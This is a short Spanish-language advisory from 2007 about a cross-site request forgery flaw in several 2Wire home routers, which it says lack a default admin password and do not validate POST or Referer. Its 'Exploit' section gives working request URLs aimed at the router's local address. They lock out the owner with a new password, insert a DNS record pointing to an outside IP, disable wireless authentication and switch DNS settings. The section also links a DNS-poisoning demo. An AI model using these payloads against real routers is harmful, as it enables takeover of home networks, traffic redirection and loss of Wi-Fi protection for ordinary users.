Cross Site Request Forgery en routers 2wire

Routers Vulnerables: 1701HG, 1800HW, 2071 Gateway
Software: 3.17.5, 3.7.1, 5.29.51 Contraseña No establecida


Publicado: 14/08/2007
Modificado: 15/08/2007

http://www.2wire.com fue Notificado

E-mail: hkm@hakim.ws

Greetz a la Comunidad Underground de México, y a los
que me ayudaron a probarlo: Preth00nker, nitr0us, ...


I. Información
-------------
Son los ruteadores más populares de México y su consola de administración web no
tiene password por defecto.


II. Vulnerabilidad
----------------

Es posible hacer que el cliente realice una petición al ruteador y modifique
cualquier configuración.

No valida POST ni Referer ni nada.


III. "Exploit"
--------

Solo necesitamos hacer que el cliente realice alguna petición con la configuración
que queramos.


[ejemplos]

Ponerle password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_CONF=NUEVOPASS

Agregar un registro DNS (216.163.137.3 www.prueba.hkm):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.prueba.hkm&ADDR=216.163.137.3

Deshabilitar Autenticación inalámbrica
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&NAME=encrypt_enabled&VALUE=0

Poner DNS dinámicos
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&IP_DYNAMIC=TRUE

Deshabilitar Firewall
Resetear configuración
etc...

Demo de envenenamiento dns: http://www.hakim.ws/2wire/demodns.html